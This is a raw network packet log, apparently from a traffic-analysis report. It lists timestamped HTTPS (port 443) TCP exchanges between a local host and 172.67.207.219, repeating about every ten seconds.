                              Aug 26, 2024 15:34:09.694928885 CEST49828443192.168.11.20172.67.207.219
                              Aug 26, 2024 15:34:09.694960117 CEST44349828172.67.207.219192.168.11.20
                              Aug 26, 2024 15:34:09.695097923 CEST49828443192.168.11.20172.67.207.219
                              Aug 26, 2024 15:34:09.695130110 CEST44349828172.67.207.219192.168.11.20
                              Aug 26, 2024 15:34:09.695231915 CEST44349828172.67.207.219192.168.11.20
                              Aug 26, 2024 15:34:09.695312023 CEST49828443192.168.11.20172.67.207.219
                              Aug 26, 2024 15:34:09.695312023 CEST49828443192.168.11.20172.67.207.219
                              Aug 26, 2024 15:34:09.695375919 CEST44349828172.67.207.219192.168.11.20
                              Aug 26, 2024 15:34:09.695395947 CEST49828443192.168.11.20172.67.207.219
                              Aug 26, 2024 15:34:19.738765955 CEST49829443192.168.11.20172.67.207.219
                              Aug 26, 2024 15:34:19.738858938 CEST44349829172.67.207.219192.168.11.20
                              Aug 26, 2024 15:34:19.739047050 CEST49829443192.168.11.20172.67.207.219
                              Aug 26, 2024 15:34:19.739250898 CEST49829443192.168.11.20172.67.207.219
                              Aug 26, 2024 15:34:19.739298105 CEST44349829172.67.207.219192.168.11.20
                              Aug 26, 2024 15:34:19.958842993 CEST44349829172.67.207.219192.168.11.20
                              Aug 26, 2024 15:34:19.959031105 CEST49829443192.168.11.20172.67.207.219
                              Aug 26, 2024 15:34:19.959309101 CEST49829443192.168.11.20172.67.207.219
                              Aug 26, 2024 15:34:19.959356070 CEST44349829172.67.207.219192.168.11.20
                              Aug 26, 2024 15:34:19.959377050 CEST49829443192.168.11.20172.67.207.219
                              Aug 26, 2024 15:34:19.959402084 CEST44349829172.67.207.219192.168.11.20
                              Aug 26, 2024 15:34:20.207070112 CEST44349829172.67.207.219192.168.11.20
                              Aug 26, 2024 15:34:20.207281113 CEST49829443192.168.11.20172.67.207.219
                              Aug 26, 2024 15:34:20.207328081 CEST44349829172.67.207.219192.168.11.20
                              Aug 26, 2024 15:34:20.207367897 CEST44349829172.67.207.219192.168.11.20
                              Aug 26, 2024 15:34:20.207561970 CEST49829443192.168.11.20172.67.207.219
                              Aug 26, 2024 15:34:20.207640886 CEST44349829172.67.207.219192.168.11.20
                              Aug 26, 2024 15:34:20.207904100 CEST49829443192.168.11.20172.67.207.219
                              Aug 26, 2024 15:34:20.207959890 CEST44349829172.67.207.219192.168.11.20
                              Aug 26, 2024 15:34:20.207997084 CEST44349829172.67.207.219192.168.11.20
                              Aug 26, 2024 15:34:20.208223104 CEST49829443192.168.11.20172.67.207.219
                              Aug 26, 2024 15:34:20.208295107 CEST49829443192.168.11.20172.67.207.219
                              Aug 26, 2024 15:34:20.208353996 CEST44349829172.67.207.219192.168.11.20
                              Aug 26, 2024 15:34:30.252325058 CEST49830443192.168.11.20172.67.207.219
                              Aug 26, 2024 15:34:30.252418995 CEST44349830172.67.207.219192.168.11.20
                              Aug 26, 2024 15:34:30.252625942 CEST49830443192.168.11.20172.67.207.219
                              Aug 26, 2024 15:34:30.252865076 CEST49830443192.168.11.20172.67.207.219
                              Aug 26, 2024 15:34:30.252923012 CEST44349830172.67.207.219192.168.11.20
                              Aug 26, 2024 15:34:30.464456081 CEST44349830172.67.207.219192.168.11.20
                              Aug 26, 2024 15:34:30.464674950 CEST49830443192.168.11.20172.67.207.219
                              Aug 26, 2024 15:34:30.465076923 CEST49830443192.168.11.20172.67.207.219
                              Aug 26, 2024 15:34:30.465086937 CEST44349830172.67.207.219192.168.11.20
                              Aug 26, 2024 15:34:30.465208054 CEST49830443192.168.11.20172.67.207.219
                              Aug 26, 2024 15:34:30.465215921 CEST44349830172.67.207.219192.168.11.20
                              Aug 26, 2024 15:34:30.714543104 CEST44349830172.67.207.219192.168.11.20
                              Aug 26, 2024 15:34:30.714711905 CEST49830443192.168.11.20172.67.207.219
                              Aug 26, 2024 15:34:30.714797974 CEST44349830172.67.207.219192.168.11.20
                              Aug 26, 2024 15:34:30.715009928 CEST49830443192.168.11.20172.67.207.219
                              Aug 26, 2024 15:34:30.715033054 CEST44349830172.67.207.219192.168.11.20
                              Aug 26, 2024 15:34:30.715084076 CEST44349830172.67.207.219192.168.11.20
                              Aug 26, 2024 15:34:30.715200901 CEST49830443192.168.11.20172.67.207.219
                              Aug 26, 2024 15:34:30.715265036 CEST49830443192.168.11.20172.67.207.219
                              Aug 26, 2024 15:34:30.715312004 CEST44349830172.67.207.219192.168.11.20
                              Aug 26, 2024 15:34:30.715529919 CEST44349830172.67.207.219192.168.11.20
                              Aug 26, 2024 15:34:30.715547085 CEST49830443192.168.11.20172.67.207.219
                              Aug 26, 2024 15:34:30.715714931 CEST49830443192.168.11.20172.67.207.219
                              Aug 26, 2024 15:34:30.715790033 CEST49830443192.168.11.20172.67.207.219
                              Aug 26, 2024 15:34:30.715850115 CEST44349830172.67.207.219192.168.11.20
                              Aug 26, 2024 15:34:40.781192064 CEST49831443192.168.11.20172.67.207.219
                              Aug 26, 2024 15:34:40.781295061 CEST44349831172.67.207.219192.168.11.20
                              Aug 26, 2024 15:34:40.781589985 CEST49831443192.168.11.20172.67.207.219
                              Aug 26, 2024 15:34:40.781760931 CEST49831443192.168.11.20172.67.207.219
                              Aug 26, 2024 15:34:40.781825066 CEST44349831172.67.207.219192.168.11.20
                              Aug 26, 2024 15:34:40.994349003 CEST44349831172.67.207.219192.168.11.20
                              Aug 26, 2024 15:34:40.994528055 CEST49831443192.168.11.20172.67.207.219
                              Aug 26, 2024 15:34:40.994843006 CEST49831443192.168.11.20172.67.207.219
                              Aug 26, 2024 15:34:40.994856119 CEST44349831172.67.207.219192.168.11.20
                              Aug 26, 2024 15:34:40.995135069 CEST49831443192.168.11.20172.67.207.219
                              Aug 26, 2024 15:34:40.995151997 CEST44349831172.67.207.219192.168.11.20
                              Aug 26, 2024 15:34:41.251184940 CEST44349831172.67.207.219192.168.11.20
                              Aug 26, 2024 15:34:41.251384020 CEST49831443192.168.11.20172.67.207.219
                              Aug 26, 2024 15:34:41.251449108 CEST44349831172.67.207.219192.168.11.20
                              Aug 26, 2024 15:34:41.251491070 CEST44349831172.67.207.219192.168.11.20
                              Aug 26, 2024 15:34:41.251633883 CEST49831443192.168.11.20172.67.207.219
                              Aug 26, 2024 15:34:41.251703024 CEST44349831172.67.207.219192.168.11.20
                              Aug 26, 2024 15:34:41.251867056 CEST49831443192.168.11.20172.67.207.219
                              Aug 26, 2024 15:34:41.251899958 CEST44349831172.67.207.219192.168.11.20
                              Aug 26, 2024 15:34:41.251971960 CEST44349831172.67.207.219192.168.11.20
                              Aug 26, 2024 15:34:41.252072096 CEST49831443192.168.11.20172.67.207.219
                              Aug 26, 2024 15:34:41.252073050 CEST49831443192.168.11.20172.67.207.219
                              Aug 26, 2024 15:34:41.252125978 CEST44349831172.67.207.219192.168.11.20
                              Aug 26, 2024 15:34:41.252222061 CEST49831443192.168.11.20172.67.207.219
                              Aug 26, 2024 15:34:51.310218096 CEST49832443192.168.11.20172.67.207.219
                              Aug 26, 2024 15:34:51.310339928 CEST44349832172.67.207.219192.168.11.20
                              Aug 26, 2024 15:34:51.310626030 CEST49832443192.168.11.20172.67.207.219
                              Aug 26, 2024 15:34:51.310841084 CEST49832443192.168.11.20172.67.207.219
                              Aug 26, 2024 15:34:51.310900927 CEST44349832172.67.207.219192.168.11.20
                              Aug 26, 2024 15:34:51.527816057 CEST44349832172.67.207.219192.168.11.20
                              Aug 26, 2024 15:34:51.528083086 CEST49832443192.168.11.20172.67.207.219
                              Aug 26, 2024 15:34:51.528239965 CEST49832443192.168.11.20172.67.207.219
                              Aug 26, 2024 15:34:51.528253078 CEST44349832172.67.207.219192.168.11.20
                              Aug 26, 2024 15:34:51.528501987 CEST49832443192.168.11.20172.67.207.219
                              Aug 26, 2024 15:34:51.528515100 CEST44349832172.67.207.219192.168.11.20
                              Aug 26, 2024 15:34:51.795605898 CEST44349832172.67.207.219192.168.11.20
                              Aug 26, 2024 15:34:51.795838118 CEST49832443192.168.11.20172.67.207.219
                              Aug 26, 2024 15:34:51.795881033 CEST44349832172.67.207.219192.168.11.20
                              Aug 26, 2024 15:34:51.795928955 CEST44349832172.67.207.219192.168.11.20
                              Aug 26, 2024 15:34:51.796114922 CEST49832443192.168.11.20172.67.207.219
                              Aug 26, 2024 15:34:51.796159983 CEST44349832172.67.207.219192.168.11.20
                              Aug 26, 2024 15:34:51.796360970 CEST49832443192.168.11.20172.67.207.219
                              Aug 26, 2024 15:34:51.796402931 CEST44349832172.67.207.219192.168.11.20
                              Aug 26, 2024 15:34:51.796593904 CEST49832443192.168.11.20172.67.207.219
                              Aug 26, 2024 15:34:51.796662092 CEST44349832172.67.207.219192.168.11.20
                              Aug 26, 2024 15:34:51.796710014 CEST44349832172.67.207.219192.168.11.20
                              Aug 26, 2024 15:34:51.796838045 CEST49832443192.168.11.20172.67.207.219
                              Aug 26, 2024 15:34:51.796838045 CEST49832443192.168.11.20172.67.207.219
                              Aug 26, 2024 15:34:52.105837107 CEST49832443192.168.11.20172.67.207.219
                              Aug 26, 2024 15:34:52.105963945 CEST44349832172.67.207.219192.168.11.20
                              Aug 26, 2024 15:35:01.870495081 CEST49833443192.168.11.20172.67.207.219
                              Aug 26, 2024 15:35:01.870589018 CEST44349833172.67.207.219192.168.11.20
                              Aug 26, 2024 15:35:01.870830059 CEST49833443192.168.11.20172.67.207.219
                              Aug 26, 2024 15:35:01.871006012 CEST49833443192.168.11.20172.67.207.219
                              Aug 26, 2024 15:35:01.871058941 CEST44349833172.67.207.219192.168.11.20
                              Aug 26, 2024 15:35:02.090698957 CEST44349833172.67.207.219192.168.11.20
                              Aug 26, 2024 15:35:02.090995073 CEST49833443192.168.11.20172.67.207.219
                              Aug 26, 2024 15:35:02.091490030 CEST49833443192.168.11.20172.67.207.219
                              Aug 26, 2024 15:35:02.091501951 CEST44349833172.67.207.219192.168.11.20
                              Aug 26, 2024 15:35:02.091589928 CEST49833443192.168.11.20172.67.207.219
                              Aug 26, 2024 15:35:02.091600895 CEST44349833172.67.207.219192.168.11.20
                              Aug 26, 2024 15:35:02.339660883 CEST44349833172.67.207.219192.168.11.20
                              Aug 26, 2024 15:35:02.339827061 CEST49833443192.168.11.20172.67.207.219
                              Aug 26, 2024 15:35:02.339894056 CEST44349833172.67.207.219192.168.11.20
                              Aug 26, 2024 15:35:02.340087891 CEST49833443192.168.11.20172.67.207.219
                              Aug 26, 2024 15:35:02.340120077 CEST44349833172.67.207.219192.168.11.20
                              Aug 26, 2024 15:35:02.340167046 CEST44349833172.67.207.219192.168.11.20
                              Aug 26, 2024 15:35:02.340262890 CEST49833443192.168.11.20172.67.207.219
                              Aug 26, 2024 15:35:02.340322018 CEST49833443192.168.11.20172.67.207.219
                              Aug 26, 2024 15:35:02.340368032 CEST44349833172.67.207.219192.168.11.20
                              Aug 26, 2024 15:35:02.340552092 CEST49833443192.168.11.20172.67.207.219
                              Aug 26, 2024 15:35:02.340620041 CEST44349833172.67.207.219192.168.11.20
                              Aug 26, 2024 15:35:02.340679884 CEST44349833172.67.207.219192.168.11.20
                              Aug 26, 2024 15:35:02.340792894 CEST49833443192.168.11.20172.67.207.219
                              Aug 26, 2024 15:35:02.340792894 CEST49833443192.168.11.20172.67.207.219
                              Aug 26, 2024 15:35:02.340878963 CEST44349833172.67.207.219192.168.11.20
                              Aug 26, 2024 15:35:02.340950966 CEST49833443192.168.11.20172.67.207.219
                              Aug 26, 2024 15:35:12.399355888 CEST49834443192.168.11.20172.67.207.219
                              Aug 26, 2024 15:35:12.399476051 CEST44349834172.67.207.219192.168.11.20
                              Aug 26, 2024 15:35:12.399729013 CEST49834443192.168.11.20172.67.207.219
                              Aug 26, 2024 15:35:12.399951935 CEST49834443192.168.11.20172.67.207.219
                              Aug 26, 2024 15:35:12.400011063 CEST44349834172.67.207.219192.168.11.20
                              Aug 26, 2024 15:35:12.618773937 CEST44349834172.67.207.219192.168.11.20
                              Aug 26, 2024 15:35:12.619009018 CEST49834443192.168.11.20172.67.207.219
                              Aug 26, 2024 15:35:12.619539976 CEST49834443192.168.11.20172.67.207.219
                              Aug 26, 2024 15:35:12.619553089 CEST44349834172.67.207.219192.168.11.20
                              Aug 26, 2024 15:35:12.619627953 CEST49834443192.168.11.20172.67.207.219
                              Aug 26, 2024 15:35:12.619640112 CEST44349834172.67.207.219192.168.11.20
                              Aug 26, 2024 15:35:12.874613047 CEST44349834172.67.207.219192.168.11.20
                              Aug 26, 2024 15:35:12.874766111 CEST44349834172.67.207.219192.168.11.20
                              Aug 26, 2024 15:35:12.874840975 CEST44349834172.67.207.219192.168.11.20
                              Aug 26, 2024 15:35:12.874845028 CEST49834443192.168.11.20172.67.207.219
                              Aug 26, 2024 15:35:12.874855995 CEST44349834172.67.207.219192.168.11.20
                              Aug 26, 2024 15:35:12.874965906 CEST49834443192.168.11.20172.67.207.219
                              Aug 26, 2024 15:35:12.874995947 CEST49834443192.168.11.20172.67.207.219
                              Aug 26, 2024 15:35:12.874995947 CEST49834443192.168.11.20172.67.207.219
                              Aug 26, 2024 15:35:12.875006914 CEST44349834172.67.207.219192.168.11.20
                              Aug 26, 2024 15:35:12.875062943 CEST44349834172.67.207.219192.168.11.20
                              Aug 26, 2024 15:35:12.875168085 CEST49834443192.168.11.20172.67.207.219
                              Aug 26, 2024 15:35:12.875219107 CEST49834443192.168.11.20172.67.207.219
                              Aug 26, 2024 15:35:12.875228882 CEST44349834172.67.207.219192.168.11.20
                              Aug 26, 2024 15:35:22.912717104 CEST49835443192.168.11.20172.67.207.219
                              Aug 26, 2024 15:35:22.912812948 CEST44349835172.67.207.219192.168.11.20
                              Aug 26, 2024 15:35:22.912957907 CEST49835443192.168.11.20172.67.207.219
                              Aug 26, 2024 15:35:22.913220882 CEST49835443192.168.11.20172.67.207.219
                              Aug 26, 2024 15:35:22.913264036 CEST44349835172.67.207.219192.168.11.20
                              Aug 26, 2024 15:35:23.152525902 CEST44349835172.67.207.219192.168.11.20
                              Aug 26, 2024 15:35:23.152749062 CEST49835443192.168.11.20172.67.207.219
                              Aug 26, 2024 15:35:23.152956963 CEST49835443192.168.11.20172.67.207.219
                              Aug 26, 2024 15:35:23.152971029 CEST44349835172.67.207.219192.168.11.20
                              Aug 26, 2024 15:35:23.153203964 CEST49835443192.168.11.20172.67.207.219
                              Aug 26, 2024 15:35:23.153224945 CEST44349835172.67.207.219192.168.11.20
                              Aug 26, 2024 15:35:23.403687000 CEST44349835172.67.207.219192.168.11.20
                              Aug 26, 2024 15:35:23.403912067 CEST44349835172.67.207.219192.168.11.20
                              Aug 26, 2024 15:35:23.404256105 CEST44349835172.67.207.219192.168.11.20
                              Aug 26, 2024 15:35:23.404340029 CEST49835443192.168.11.20172.67.207.219
                              Aug 26, 2024 15:35:23.404406071 CEST44349835172.67.207.219192.168.11.20
                              Aug 26, 2024 15:35:23.404433012 CEST49835443192.168.11.20172.67.207.219
                              Aug 26, 2024 15:35:23.404486895 CEST49835443192.168.11.20172.67.207.219
                              Aug 26, 2024 15:35:23.404508114 CEST44349835172.67.207.219192.168.11.20
                              Aug 26, 2024 15:35:23.404552937 CEST49835443192.168.11.20172.67.207.219
                              Aug 26, 2024 15:35:23.404674053 CEST49835443192.168.11.20172.67.207.219
                              Aug 26, 2024 15:35:23.404731989 CEST44349835172.67.207.219192.168.11.20
                              Aug 26, 2024 15:35:23.404757977 CEST49835443192.168.11.20172.67.207.219
                              Aug 26, 2024 15:35:33.457928896 CEST49836443192.168.11.20172.67.207.219
                              Aug 26, 2024 15:35:33.458050966 CEST44349836172.67.207.219192.168.11.20
                              Aug 26, 2024 15:35:33.458328009 CEST49836443192.168.11.20172.67.207.219
                              Aug 26, 2024 15:35:33.458446980 CEST49836443192.168.11.20172.67.207.219
                              Aug 26, 2024 15:35:33.458492994 CEST44349836172.67.207.219192.168.11.20
                              Aug 26, 2024 15:35:33.673587084 CEST44349836172.67.207.219192.168.11.20
                              Aug 26, 2024 15:35:33.673831940 CEST49836443192.168.11.20172.67.207.219
                              Aug 26, 2024 15:35:33.674132109 CEST49836443192.168.11.20172.67.207.219
                              Aug 26, 2024 15:35:33.674143076 CEST44349836172.67.207.219192.168.11.20
                              Aug 26, 2024 15:35:33.674236059 CEST49836443192.168.11.20172.67.207.219
                              Aug 26, 2024 15:35:33.674248934 CEST44349836172.67.207.219192.168.11.20
                              Aug 26, 2024 15:35:33.923173904 CEST44349836172.67.207.219192.168.11.20
                              Aug 26, 2024 15:35:33.923384905 CEST44349836172.67.207.219192.168.11.20
                              Aug 26, 2024 15:35:33.923455000 CEST49836443192.168.11.20172.67.207.219
                              Aug 26, 2024 15:35:33.923512936 CEST44349836172.67.207.219192.168.11.20
                              Aug 26, 2024 15:35:33.923589945 CEST49836443192.168.11.20172.67.207.219
                              Aug 26, 2024 15:35:33.923666000 CEST44349836172.67.207.219192.168.11.20
                              Aug 26, 2024 15:35:33.923784971 CEST49836443192.168.11.20172.67.207.219
                              Aug 26, 2024 15:35:33.923827887 CEST44349836172.67.207.219192.168.11.20
                              Aug 26, 2024 15:35:33.923852921 CEST49836443192.168.11.20172.67.207.219
                              Aug 26, 2024 15:35:33.924014091 CEST44349836172.67.207.219192.168.11.20
                              Aug 26, 2024 15:35:33.924144983 CEST49836443192.168.11.20172.67.207.219
                              Aug 26, 2024 15:35:33.924290895 CEST49836443192.168.11.20172.67.207.219
                              Aug 26, 2024 15:35:33.924336910 CEST49836443192.168.11.20172.67.207.219
                              Aug 26, 2024 15:35:33.924377918 CEST44349836172.67.207.219192.168.11.20
                              Aug 26, 2024 15:35:43.955019951 CEST49837443192.168.11.20172.67.207.219
                              Aug 26, 2024 15:35:43.955141068 CEST44349837172.67.207.219192.168.11.20
                              Aug 26, 2024 15:35:43.955389023 CEST49837443192.168.11.20172.67.207.219
                              Aug 26, 2024 15:35:43.955566883 CEST49837443192.168.11.20172.67.207.219
                              Aug 26, 2024 15:35:43.955615044 CEST44349837172.67.207.219192.168.11.20
                              Aug 26, 2024 15:35:44.175247908 CEST44349837172.67.207.219192.168.11.20
                              Aug 26, 2024 15:35:44.175518036 CEST49837443192.168.11.20172.67.207.219
                              Aug 26, 2024 15:35:44.175795078 CEST49837443192.168.11.20172.67.207.219
                              Aug 26, 2024 15:35:44.175832987 CEST44349837172.67.207.219192.168.11.20
                              Aug 26, 2024 15:35:44.175937891 CEST49837443192.168.11.20172.67.207.219
                              Aug 26, 2024 15:35:44.176000118 CEST44349837172.67.207.219192.168.11.20
                              Aug 26, 2024 15:35:44.422889948 CEST44349837172.67.207.219192.168.11.20
                              Aug 26, 2024 15:35:44.423083067 CEST49837443192.168.11.20172.67.207.219
                              Aug 26, 2024 15:35:44.423149109 CEST44349837172.67.207.219192.168.11.20
                              Aug 26, 2024 15:35:44.423312902 CEST49837443192.168.11.20172.67.207.219
                              Aug 26, 2024 15:35:44.423356056 CEST44349837172.67.207.219192.168.11.20
                              Aug 26, 2024 15:35:44.423382998 CEST44349837172.67.207.219192.168.11.20
                              Aug 26, 2024 15:35:44.423542023 CEST49837443192.168.11.20172.67.207.219
                              Aug 26, 2024 15:35:44.423572063 CEST44349837172.67.207.219192.168.11.20
                              Aug 26, 2024 15:35:44.423729897 CEST49837443192.168.11.20172.67.207.219
                              Aug 26, 2024 15:35:44.423770905 CEST44349837172.67.207.219192.168.11.20
                              Aug 26, 2024 15:35:44.423993111 CEST49837443192.168.11.20172.67.207.219
                              Aug 26, 2024 15:35:44.424063921 CEST49837443192.168.11.20172.67.207.219
                              Aug 26, 2024 15:35:44.424114943 CEST44349837172.67.207.219192.168.11.20
                              Aug 26, 2024 15:35:54.483999968 CEST49838443192.168.11.20172.67.207.219
                              Aug 26, 2024 15:35:54.484122038 CEST44349838172.67.207.219192.168.11.20
                              Aug 26, 2024 15:35:54.484386921 CEST49838443192.168.11.20172.67.207.219
                              Aug 26, 2024 15:35:54.484638929 CEST49838443192.168.11.20172.67.207.219
                              Aug 26, 2024 15:35:54.484704018 CEST44349838172.67.207.219192.168.11.20
                              Aug 26, 2024 15:35:54.705614090 CEST44349838172.67.207.219192.168.11.20
                              Aug 26, 2024 15:35:54.705784082 CEST49838443192.168.11.20172.67.207.219
                              Aug 26, 2024 15:35:54.706073046 CEST49838443192.168.11.20172.67.207.219
                              Aug 26, 2024 15:35:54.706111908 CEST44349838172.67.207.219192.168.11.20
                              Aug 26, 2024 15:35:54.706175089 CEST49838443192.168.11.20172.67.207.219
                              Aug 26, 2024 15:35:54.706198931 CEST44349838172.67.207.219192.168.11.20
                              Aug 26, 2024 15:35:54.951853037 CEST44349838172.67.207.219192.168.11.20
                              Aug 26, 2024 15:35:54.952040911 CEST49838443192.168.11.20172.67.207.219
                              Aug 26, 2024 15:35:54.952102900 CEST44349838172.67.207.219192.168.11.20
                              Aug 26, 2024 15:35:54.952133894 CEST44349838172.67.207.219192.168.11.20
                              Aug 26, 2024 15:35:54.952297926 CEST49838443192.168.11.20172.67.207.219
                              Aug 26, 2024 15:35:54.952364922 CEST44349838172.67.207.219192.168.11.20
                              Aug 26, 2024 15:35:54.952569008 CEST49838443192.168.11.20172.67.207.219
                              Aug 26, 2024 15:35:54.952616930 CEST44349838172.67.207.219192.168.11.20
                              Aug 26, 2024 15:35:54.952752113 CEST49838443192.168.11.20172.67.207.219
                              Aug 26, 2024 15:35:54.952990055 CEST44349838172.67.207.219192.168.11.20
                              Aug 26, 2024 15:35:54.953217030 CEST44349838172.67.207.219192.168.11.20
                              Aug 26, 2024 15:35:54.953223944 CEST49838443192.168.11.20172.67.207.219
                              Aug 26, 2024 15:35:54.953282118 CEST49838443192.168.11.20172.67.207.219
                              Aug 26, 2024 15:35:54.953325987 CEST44349838172.67.207.219192.168.11.20
                              Aug 26, 2024 15:35:54.953344107 CEST49838443192.168.11.20172.67.207.219
                              Aug 26, 2024 15:35:54.953442097 CEST49838443192.168.11.20172.67.207.219
                              Aug 26, 2024 15:36:05.013278008 CEST49839443192.168.11.20172.67.207.219
                              Aug 26, 2024 15:36:05.013400078 CEST44349839172.67.207.219192.168.11.20
                              Aug 26, 2024 15:36:05.013720036 CEST49839443192.168.11.20172.67.207.219
                              Aug 26, 2024 15:36:05.014059067 CEST49839443192.168.11.20172.67.207.219
                              Aug 26, 2024 15:36:05.014122963 CEST44349839172.67.207.219192.168.11.20
                              Aug 26, 2024 15:36:05.230519056 CEST44349839172.67.207.219192.168.11.20
                              Aug 26, 2024 15:36:05.230643988 CEST49839443192.168.11.20172.67.207.219
                              Aug 26, 2024 15:36:05.230988026 CEST49839443192.168.11.20172.67.207.219
                              Aug 26, 2024 15:36:05.231000900 CEST44349839172.67.207.219192.168.11.20
                              Aug 26, 2024 15:36:05.231080055 CEST49839443192.168.11.20172.67.207.219
                              Aug 26, 2024 15:36:05.231091022 CEST44349839172.67.207.219192.168.11.20
                              Aug 26, 2024 15:36:05.482888937 CEST44349839172.67.207.219192.168.11.20
                              Aug 26, 2024 15:36:05.483113050 CEST49839443192.168.11.20172.67.207.219
                              Aug 26, 2024 15:36:05.483212948 CEST44349839172.67.207.219192.168.11.20
                              Aug 26, 2024 15:36:05.483375072 CEST49839443192.168.11.20172.67.207.219
                              Aug 26, 2024 15:36:05.483386040 CEST44349839172.67.207.219192.168.11.20
                              Aug 26, 2024 15:36:05.483416080 CEST44349839172.67.207.219192.168.11.20
                              Aug 26, 2024 15:36:05.483603001 CEST49839443192.168.11.20172.67.207.219
                              Aug 26, 2024 15:36:05.483632088 CEST44349839172.67.207.219192.168.11.20
                              Aug 26, 2024 15:36:05.483807087 CEST49839443192.168.11.20172.67.207.219
                              Aug 26, 2024 15:36:05.483890057 CEST44349839172.67.207.219192.168.11.20
                              Aug 26, 2024 15:36:05.483928919 CEST44349839172.67.207.219192.168.11.20
                              Aug 26, 2024 15:36:05.484050035 CEST49839443192.168.11.20172.67.207.219
                              Aug 26, 2024 15:36:05.484093904 CEST49839443192.168.11.20172.67.207.219
                              Aug 26, 2024 15:36:05.484093904 CEST49839443192.168.11.20172.67.207.219
                              Aug 26, 2024 15:36:05.793018103 CEST49839443192.168.11.20172.67.207.219
                              Aug 26, 2024 15:36:05.793097019 CEST44349839172.67.207.219192.168.11.20
                              Aug 26, 2024 15:36:15.542022943 CEST49840443192.168.11.20172.67.207.219
                              Aug 26, 2024 15:36:15.542130947 CEST44349840172.67.207.219192.168.11.20
                              Aug 26, 2024 15:36:15.542332888 CEST49840443192.168.11.20172.67.207.219
                              Aug 26, 2024 15:36:15.542561054 CEST49840443192.168.11.20172.67.207.219
                              Aug 26, 2024 15:36:15.542624950 CEST44349840172.67.207.219192.168.11.20
                              Aug 26, 2024 15:36:15.759529114 CEST44349840172.67.207.219192.168.11.20
                              Aug 26, 2024 15:36:15.759802103 CEST49840443192.168.11.20172.67.207.219
                              Aug 26, 2024 15:36:15.760098934 CEST49840443192.168.11.20172.67.207.219
                              Aug 26, 2024 15:36:15.760114908 CEST44349840172.67.207.219192.168.11.20
                              Aug 26, 2024 15:36:15.760201931 CEST49840443192.168.11.20172.67.207.219
                              Aug 26, 2024 15:36:15.760211945 CEST44349840172.67.207.219192.168.11.20
                              Aug 26, 2024 15:36:16.007673025 CEST44349840172.67.207.219192.168.11.20
                              Aug 26, 2024 15:36:16.007833004 CEST49840443192.168.11.20172.67.207.219
                              Aug 26, 2024 15:36:16.007898092 CEST44349840172.67.207.219192.168.11.20
                              Aug 26, 2024 15:36:16.008039951 CEST49840443192.168.11.20172.67.207.219
                              Aug 26, 2024 15:36:16.008040905 CEST44349840172.67.207.219192.168.11.20
                              Aug 26, 2024 15:36:16.008074045 CEST44349840172.67.207.219192.168.11.20
                              Aug 26, 2024 15:36:16.008411884 CEST49840443192.168.11.20172.67.207.219
                              Aug 26, 2024 15:36:16.008460999 CEST44349840172.67.207.219192.168.11.20
                              Aug 26, 2024 15:36:16.008516073 CEST44349840172.67.207.219192.168.11.20
                              Aug 26, 2024 15:36:16.008765936 CEST49840443192.168.11.20172.67.207.219
                              Aug 26, 2024 15:36:16.008765936 CEST49840443192.168.11.20172.67.207.219
                              Aug 26, 2024 15:36:16.008765936 CEST49840443192.168.11.20172.67.207.219
                              Aug 26, 2024 15:36:16.322004080 CEST49840443192.168.11.20172.67.207.219
                              Aug 26, 2024 15:36:16.322102070 CEST44349840172.67.207.219192.168.11.20
                              Aug 26, 2024 15:36:26.039865971 CEST49841443192.168.11.20172.67.207.219
                              Aug 26, 2024 15:36:26.039993048 CEST44349841172.67.207.219192.168.11.20
                              Aug 26, 2024 15:36:26.040220022 CEST49841443192.168.11.20172.67.207.219
                              Aug 26, 2024 15:36:26.040426016 CEST49841443192.168.11.20172.67.207.219
                              Aug 26, 2024 15:36:26.040488958 CEST44349841172.67.207.219192.168.11.20
                              Aug 26, 2024 15:36:26.264555931 CEST44349841172.67.207.219192.168.11.20
                              Aug 26, 2024 15:36:26.264834881 CEST49841443192.168.11.20172.67.207.219
                              Aug 26, 2024 15:36:26.265145063 CEST49841443192.168.11.20172.67.207.219
                              Aug 26, 2024 15:36:26.265192986 CEST44349841172.67.207.219192.168.11.20
                              Aug 26, 2024 15:36:26.265213013 CEST49841443192.168.11.20172.67.207.219
                              Aug 26, 2024 15:36:26.265235901 CEST44349841172.67.207.219192.168.11.20
                              Aug 26, 2024 15:36:26.512546062 CEST44349841172.67.207.219192.168.11.20
                              Aug 26, 2024 15:36:26.512747049 CEST49841443192.168.11.20172.67.207.219
                              Aug 26, 2024 15:36:26.512804985 CEST44349841172.67.207.219192.168.11.20
                              Aug 26, 2024 15:36:26.512835979 CEST44349841172.67.207.219192.168.11.20
                              Aug 26, 2024 15:36:26.512974024 CEST49841443192.168.11.20172.67.207.219
                              Aug 26, 2024 15:36:26.512974024 CEST49841443192.168.11.20172.67.207.219
                              Aug 26, 2024 15:36:26.513039112 CEST44349841172.67.207.219192.168.11.20
                              Aug 26, 2024 15:36:26.513289928 CEST49841443192.168.11.20172.67.207.219
                              Aug 26, 2024 15:36:26.513345003 CEST44349841172.67.207.219192.168.11.20
                              Aug 26, 2024 15:36:26.513550997 CEST44349841172.67.207.219192.168.11.20
                              Aug 26, 2024 15:36:26.513554096 CEST49841443192.168.11.20172.67.207.219
                              Aug 26, 2024 15:36:26.513675928 CEST49841443192.168.11.20172.67.207.219
                              Aug 26, 2024 15:36:26.513742924 CEST49841443192.168.11.20172.67.207.219
                              Aug 26, 2024 15:36:26.513807058 CEST44349841172.67.207.219192.168.11.20
                              Aug 26, 2024 15:36:36.552912951 CEST49842443192.168.11.20172.67.207.219
                              Aug 26, 2024 15:36:36.553025007 CEST44349842172.67.207.219192.168.11.20
                              Aug 26, 2024 15:36:36.553248882 CEST49842443192.168.11.20172.67.207.219
                              Aug 26, 2024 15:36:36.553370953 CEST49842443192.168.11.20172.67.207.219
                              Aug 26, 2024 15:36:36.553440094 CEST44349842172.67.207.219192.168.11.20
                              Aug 26, 2024 15:36:36.769701958 CEST44349842172.67.207.219192.168.11.20
                              Aug 26, 2024 15:36:36.770281076 CEST49842443192.168.11.20172.67.207.219
                              Aug 26, 2024 15:36:36.770826101 CEST49842443192.168.11.20172.67.207.219
                              Aug 26, 2024 15:36:36.770858049 CEST44349842172.67.207.219192.168.11.20
                              Aug 26, 2024 15:36:36.770875931 CEST49842443192.168.11.20172.67.207.219
                              Aug 26, 2024 15:36:36.770886898 CEST44349842172.67.207.219192.168.11.20
                              Aug 26, 2024 15:36:37.019927025 CEST44349842172.67.207.219192.168.11.20
                              Aug 26, 2024 15:36:37.020205975 CEST44349842172.67.207.219192.168.11.20
                              Aug 26, 2024 15:36:37.020210028 CEST49842443192.168.11.20172.67.207.219
